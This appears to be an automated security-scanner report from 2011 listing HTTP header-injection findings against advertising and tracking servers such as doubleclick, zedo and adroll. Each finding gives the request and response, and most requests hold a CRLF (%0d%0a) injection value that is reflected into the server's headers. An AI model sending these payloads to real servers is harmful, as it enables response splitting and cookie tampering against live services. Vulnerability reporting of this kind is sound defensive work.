Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/pmv.inm.ind/news |
GET /93ccd%0d%0a389a982e7d5/pmv.inm.ind/news_home Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.independent.co Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/93ccd 389a982e7d5/pmv.inm.ind/news_home Date: Mon, 14 Feb 2011 01:37:54 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/resn.173878/ |
GET /1c8c4%0d%0a0177437432c/resn.173878/;alias Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1c8c4 0177437432c/resn.173878/;alias Date: Mon, 14 Feb 2011 01:37:18 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/uk.reuters/news |
GET /60afd%0d%0a8f5fec5b5f5/uk.reuters/news Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/60afd 8f5fec5b5f5/uk.reuters/news Date: Mon, 14 Feb 2011 01:36:09 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/wpni.politics |
GET /5c397%0d%0a667e0f07fb/wpni.politics;ad=lb;sz Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.washingtonpost Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5c397 667e0f07fb/wpni.politics;ad=lb;sz Date: Mon, 14 Feb 2011 01:35:27 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/wpni.politics |
GET /53d32%0d%0a19fe23f2faf/wpni.politics/inlinead Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.washingtonpost Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/53d32 19fe23f2faf/wpni.politics/inlinead Date: Mon, 14 Feb 2011 01:38:10 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/sta.php |
GET /adscgen/sta.php?survey Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://redcated/UNY Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LP=1297439616; CS1=823529-1-2_39959898 |
HTTP/1.1 302 Found Date: Mon, 14 Feb 2011 02:16:54 GMT Server: Apache-AdvancedExtra X-Powered-By: PHP/4.3.8 DL_S: a208.dl Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:53 GMT; path=/; domain=.questionmarket Set-Cookie: CS1=823529-1-2_39959898 Set-Cookie: ES=823529-ie.pM-MG_844890 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Cache-Control: post-check=0, pre-check=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch Location: http://a.dlqm.net/adscgen a355c11c9ff Content-Length: 33 Content-Type: text/html /* /adsc/d862189/4/-1/randm |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/sta.php |
GET /adscgen/sta.php?survey Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://redcated/UNY Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LP=1297439616; CS1=823529-1-2_39959898 |
HTTP/1.1 302 Found Date: Mon, 14 Feb 2011 02:16:55 GMT Server: Apache-AdvancedExtra X-Powered-By: PHP/4.3.8 DL_S: a227.dl Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:54 GMT; path=/; domain=.questionmarket Set-Cookie: CS1=823529-1-2_39959898 Set-Cookie: ES=823529-ie.pM-MG_844890 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Cache-Control: post-check=0, pre-check=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch Location: http://a.dlqm.net/adscgen a14210b269c4186 Content-Length: 33 Content-Type: text/html /* /adsc/d862189/4/-1/randm |
Severity: | High |
Confidence: | Certain |
Host: | http://bidder.mathtag.com |
Path: | /notify |
GET /notify?exch=b7a2e%0d%0a2669694ed50&id=5aW95q2jLzEvWlRa Host: bidder.mathtag.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mt_mop=10001:1297389082|1 |
HTTP/1.1 404 Not found Date: Mon, 14 Feb 2011 02:01:37 GMT Server: MMBD/3.4.3.2 Content-Type: text/html; charset=utf-8 Content-Length: 18 x-mm-debug: exchange not found - b7a2e 2669694ed50 x-mm-host: ewr-bidder-x2 Connection: keep-alive Request not found |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=1948 3fb48ff6f67; expires=Sat, 14-May-2011 20: 33:39 GMT; domain=bs.serving-sys.com Set-Cookie: A3=gPVtafzY0bnA00001 Set-Cookie: B3=89PS000000000St88 Set-Cookie: u2=1b39b065-3668-4ab4 P3P: CP="NOI DEVa OUR BUS UNI" Date: Mon, 14 Feb 2011 01:33:39 GMT Connection: close Content-Length: 2219 var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-401/c5/jsc/fm.js |
GET /bar/v16-401/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://media2.legacy.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=INmz6woBADYA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:7882f dcb3cfdd72c;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=305,2942,9:305,4506 Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "419234-82a5-4988a5a Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=64 Expires: Mon, 14 Feb 2011 01:30:24 GMT Date: Mon, 14 Feb 2011 01:29:20 GMT Connection: close Content-Length: 4228 // Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=916;var zzPat=',7882f ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /utils/ecSet.js |
GET /utils/ecSet.js?v=cefd9%0d%0a310d8c3cc8d&d=.zedo.com HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://media2.legacy.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=INmz6woBADYA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1 Content-Type: application/x-javascript Set-Cookie: cefd9 310d8c3cc8d;expires=Wed, 16 Mar 2011 05: 00:00 GMT;domain=.zedo.com;path ETag: "2971d9-1f5-47f29204ac3c0 Vary: Accept-Encoding X-Varnish: 1725802099 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=2283 Date: Mon, 14 Feb 2011 01:29:12 GMT Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://d.adroll.com |
Path: | /pixel/DBLH4FNWEJG3H |
GET /pixel/148bc%0d%0a00a581bb834/LJ7DC3I6ENDUDJRX7PVZRX Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://aboutecho.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __adroll=7eac527dab8 |
HTTP/1.1 302 Moved Temporarily Server: nginx/0.7.67 Date: Mon, 14 Feb 2011 14:35:08 GMT Connection: keep-alive Set-Cookie: __adroll=7eac527dab8 Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/pixel 00a581bb834/LJ7DC3I6ENDUDJRX7PVZRX Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate |
Severity: | High |
Confidence: | Certain |
Host: | http://d.adroll.com |
Path: | /pixel/DBLH4FNWEJG3H |
GET /pixel/DBLH4FNWEJG3H Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://aboutecho.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __adroll=7eac527dab8 |
HTTP/1.1 302 Moved Temporarily Server: nginx/0.7.67 Date: Mon, 14 Feb 2011 14:35:09 GMT Connection: keep-alive Set-Cookie: __adroll=7eac527dab8 Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com 5b0b82ad641/pixel.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-401/d3/jsc/fm.js |
GET /bar/v16-401/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://media2.legacy.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=INmz6woBADYA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1120:ae973 0345b07197e;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1120,1,9:305,4506 Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFChanCap=1463B1219,48 ETag: "19b436a-82a5-4989a5 Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=284 Expires: Mon, 14 Feb 2011 01:34:04 GMT Date: Mon, 14 Feb 2011 01:29:20 GMT Connection: close Content-Length: 2099 // Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',ae973 0345 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-401/d3/jsc/fmr |
GET /bar/v16-401/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://media2.legacy.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=INmz6woBADYA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1120:29b5a c4af126ee8c;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1120,1,9;expires Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFChanCap=1463B1219,48 ETag: "812b9fe7-809a-4989a Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=59 Expires: Mon, 14 Feb 2011 01:15:59 GMT Date: Mon, 14 Feb 2011 01:15:00 GMT Connection: close Content-Length: 2099 // Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',29b5a c4af ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dw.com.com |
Path: | /clear/c.gif |
GET /clear/fcbbe%0d%0a18ae7dfebfb?ptid=8301&onid=503544 Host: dw.com.com Proxy-Connection: keep-alive Referer: http://www.cbsnews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: XCLGFbrowser=Cg5iVU0qL2O |
HTTP/1.1 302 Found Date: Mon, 14 Feb 2011 01:37:05 GMT Server: Apache/2.0 Pragma: no-cache Cache-control: no-cache, must-revalidate, no-transform Vary: * Expires: Fri, 23 Jan 1970 12:12:12 GMT Location: http://dw.cbsnews.com 18ae7dfebfb?ts=1297647425497435&clgf Content-Length: 0 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Content-Type: image/gif |
Severity: | High |
Confidence: | Certain |
Host: | http://live.activeco |
Path: | /webtracker/track2.html |
GET /webtracker/track2.html Host: live.activeconversion.com Proxy-Connection: keep-alive Referer: http://mzima.net/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _wt_31021=1296942871924 |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 14:37:26 GMT Server: Apache Pragma: no-cache Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=B277C1185 Set-Cookie: _wt_30120="1297694251289|6ab95 f1c7ac10bc3|0"; Max-Age=630720000;Path=/; HttpOnly P3P: policyref="http://www Connection: close Content-Type: image/png Content-Length: 68 .PNG . ...IHDR.................... |
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
GET /rtx/r.js?cmd=ADG&si Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://www.nola.com/crime Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ATTACID=a3Z0aWQ9MTZp |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:37:29 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Mon, 14 Feb 2011 01:52:29 GMT Set-Cookie: ANRTT=50213^1^1297712974 Set-Cookie: Tsid=0^1297647449 Set-Cookie: TData=99999|^|50160|50412 Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:29 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:3e9134c20f00f3af c17363f719d,5bf47211ff9e0cf44f4 Set-Cookie: ATTAC=a3ZzZWc9OTk5OT Cteonnt-Length: 312 Content-Type: application/x-javascript Content-Length: 312 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16if17a0kq0bgd'; var ANSL='99999|^|50160|50412 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
GET /rtx/r.js?cmd=ADG&si=a3bf5%0d%0af4a1b2b0c20&pi=-&xs=3&pu=http%253A/ Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://www.nola.com/crime Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ATTACID=a3Z0aWQ9MTZp |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:37:28 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Mon, 14 Feb 2011 01:52:28 GMT Set-Cookie: ANRTT=50213^1^1297712974 Set-Cookie: Tsid=0^1297647448 f4a1b2b0c20^1297647448^1297649248; path=/; expires=Mon, 14-Feb-11 02:07:28 GMT; domain=tacoda.at.atwola Set-Cookie: TData=99999|^|50160|50412 Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:28 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:3e9134c20f00f3af Set-Cookie: ATTAC=a3ZzZWc9OTk5OT ntCoent-Length: 312 Content-Type: application/x-javascript Content-Length: 312 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16if17a0kq0bgd'; var ANSL='99999|^|50160|50412 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://w55c.net |
Path: | /m.gif |
GET /m.gif?rurl=a0486%0d%0a6392edd76fb HTTP/1.1 Host: w55c.net Proxy-Connection: keep-alive Referer: http://assets.rubico Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; matchadmeld=1; wfivefivec=MDo0lVW4J |
HTTP/1.1 302 Found P3P: policyref='http://w55c Location: http://a0486 6392edd76fb Content-Length: 0 Date: Mon, 14 Feb 2011 01:34:34 GMT Server: w55c.net |